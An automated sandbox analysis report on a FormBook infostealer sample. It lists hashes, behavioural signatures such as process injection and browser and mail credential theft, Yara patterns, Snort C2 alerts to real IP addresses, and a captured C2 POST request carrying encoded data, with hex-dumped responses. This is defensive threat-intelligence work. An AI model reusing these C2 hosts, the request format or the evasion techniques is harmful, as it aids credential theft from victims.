Windows Analysis Report
WrrCV4QR2J.exe

Overview

General Information

Sample name: WrrCV4QR2J.exe (renamed because original name is a hash value)
Original sample name: dc9c5d5251164a289cac05382c699c11fb51463f88fea60746dd571e1feeb5fc.exe
Analysis ID: 1356273
MD5: 26c7731786626894ce4fcc339951a26b
SHA1: 5103ffe527e144a275696454b45b1bda26c152bd
SHA256: dc9c5d5251164a289cac05382c699c11fb51463f88fea60746dd571e1feeb5fc
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • WrrCV4QR2J.exe (PID: 4480 cmdline: C:\Users\user\Desktop\WrrCV4QR2J.exe MD5: 26C7731786626894CE4FCC339951A26B)
    • WrrCV4QR2J.exe (PID: 7240 cmdline: C:\Users\user\Desktop\WrrCV4QR2J.exe MD5: 26C7731786626894CE4FCC339951A26B)
      • UHPrrMeffyCaz.exe (PID: 2364 cmdline: "C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7348 cmdline: C:\Windows\SysWOW64\isoburn.exe MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • UHPrrMeffyCaz.exe (PID: 5016 cmdline: "C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7728 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2fcf4:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1bed3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.WrrCV4QR2J.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.WrrCV4QR2J.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2aef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.WrrCV4QR2J.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.WrrCV4QR2J.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            Timestamp | Source IP:Port | Destination IP:Port | SID | Protocol | Classtype
            12/08/23-14:50:42.900472 | 192.168.2.4:49743 | 74.208.236.181:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:51:57.012130 | 192.168.2.4:49764 | 66.29.155.54:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:52:40.619764 | 192.168.2.4:49776 | 85.159.66.93:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:53:57.335622 | 192.168.2.4:49796 | 52.220.48.161:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:53:40.611998 | 192.168.2.4:49792 | 37.97.254.27:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:50:19.134288 | 192.168.2.4:49739 | 162.222.226.77:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:50:56.404687 | 192.168.2.4:49748 | 104.21.18.253:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:53:26.280190 | 192.168.2.4:49788 | 107.178.250.177:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:52:55.335271 | 192.168.2.4:49780 | 162.241.252.161:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:51:11.265685 | 192.168.2.4:49752 | 37.140.192.89:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:52:11.624074 | 192.168.2.4:49768 | 34.117.26.57:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:51:27.263886 | 192.168.2.4:49756 | 131.153.147.90:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:52:25.956590 | 192.168.2.4:49772 | 81.169.145.70:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:51:42.204368 | 192.168.2.4:49760 | 94.23.162.163:80 | 2855465 | TCP | A Network Trojan was detected
            12/08/23-14:53:10.644355 | 192.168.2.4:49784 | 185.74.252.11:80 | 2855465 | TCP | A Network Trojan was detected

            AV Detection

            Source: WrrCV4QR2J.exe | Avira: detected
            Source: WrrCV4QR2J.exe | ReversingLabs: Detection: 73%
            Source: Yara match | File source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: WrrCV4QR2J.exe | Joe Sandbox ML: detected
            Source: WrrCV4QR2J.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: WrrCV4QR2J.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UHPrrMeffyCaz.exe, 00000003.00000002.4120453242.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1845745734.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: WrrCV4QR2J.exe, WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 4_2_028EC280 FindFirstFileW,FindNextFileW,FindClose | 4_2_028EC280
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 4x nop then pop edi | 4_2_028E1A10
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 4x nop then xor eax, eax | 4_2_028D99C0
            Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 4x nop then pop edi | 4_2_028DE2BF

            Networking

            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49739 -> 162.222.226.77:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 74.208.236.181:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 104.21.18.253:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 37.140.192.89:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 131.153.147.90:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 94.23.162.163:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 66.29.155.54:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 34.117.26.57:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 81.169.145.70:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49776 -> 85.159.66.93:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 162.241.252.161:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49784 -> 185.74.252.11:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49788 -> 107.178.250.177:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49792 -> 37.97.254.27:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49796 -> 52.220.48.161:80
            Source: Joe Sandbox View | IP Address: 37.97.254.27
            Source: Joe Sandbox View | ASN Name: SS-ASHUS
            Source: Joe Sandbox View | ASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL
            Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: www.alldaysslimmingstea.com
            Source: unknown HTTP traffic detected: POST /ahec/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.user4deepriver.com Origin: http://www.user4deepriver.com Referer: http://www.user4deepriver.com/ahec/ Cache-Control: no-cache Content-Length: 189 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4 Data Ascii: XveXHZvx=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIytni9uCUDpH0nHCxDCw==
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:50:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 08 Dec 2023 13:50:34 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 08 Dec 2023 13:50:37 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 08 Dec 2023 13:50:40 GMT Server: Apache Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Fri, 08 Dec 2023 13:50:42 GMT Server: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 08 Dec 2023 13:51:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"64f9f107-377d8" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 08 Dec 2023 13:51:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"64f9f107-377d8" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 08 Dec 2023 13:51:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"64f9f107-377d8" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 08 Dec 2023 13:51:11 GMT Content-Type: text/html Content-Length: 227288 Connection: close Vary: Accept-Encoding ETag: "64f9f107-377d8"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:51:18 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:51:21 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:51:24 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:51:27 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 08 Dec 2023 13:51:42 GMT Content-Type: text/html Content-Length: 178 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:48 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 
34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:50 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 
34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 